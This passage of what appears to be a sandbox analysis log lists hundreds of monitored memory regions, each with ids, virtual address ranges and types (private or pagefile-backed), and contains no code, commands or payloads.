0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5563 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5564 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5565 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5566 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5567 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5568 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5569 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5570 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5571 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5572 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5573 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5574 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5575 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5576 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5577 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5578 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5579 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5580 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5581 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5582 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5583 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5584 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5585 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5586 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5587 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5588 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5589 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5590 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5591 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5592 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5593 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5594 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5595 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5596 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5597 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5598 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5599 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5600 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5601 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5602 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5603 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5604 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5605 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5606 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5607 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5608 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5609 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5610 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5611 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5612 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5613 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5614 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5615 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5616 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5617 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5618 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5619 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5620 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5621 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5622 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5623 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5624 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5625 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5626 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5627 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5628 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5629 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5630 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5631 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5632 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5633 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5634 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5635 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5636 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5637 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5638 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5639 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5640 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5641 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5642 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5643 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5644 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5645 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5646 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5647 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5648 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5649 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5650 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5651 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5652 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5653 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5654 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5655 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5656 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5657 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5658 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5659 start_va = 0x4960000 end_va = 0x4a59fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004960000" filename = "" Region: id = 5660 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5661 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5662 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5663 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5664 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5665 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5666 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5667 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5668 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5669 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5670 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5671 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5672 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5673 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5674 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5675 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5676 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5677 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5678 start_va = 0x2370000 end_va = 0x237efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5679 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5680 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5681 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5682 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5683 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5684 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5685 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5686 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5687 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5688 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5689 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5690 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5691 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5692 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5693 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5694 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5695 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5696 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5697 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5698 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5699 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5700 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5701 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 5702 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 5703 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5704 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5705 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5706 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5707 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5708 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5709 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5710 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5711 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5712 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5713 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5714 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5715 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5716 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5717 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5718 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5719 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5720 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5721 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5722 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5723 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5724 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5725 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5726 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5727 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5728 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5729 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5730 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5731 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5732 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5733 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5734 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5735 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5736 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5737 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5738 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5739 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5740 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5741 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5742 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5743 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5744 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5745 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5746 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5747 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5748 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 5749 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5750 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 5751 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = 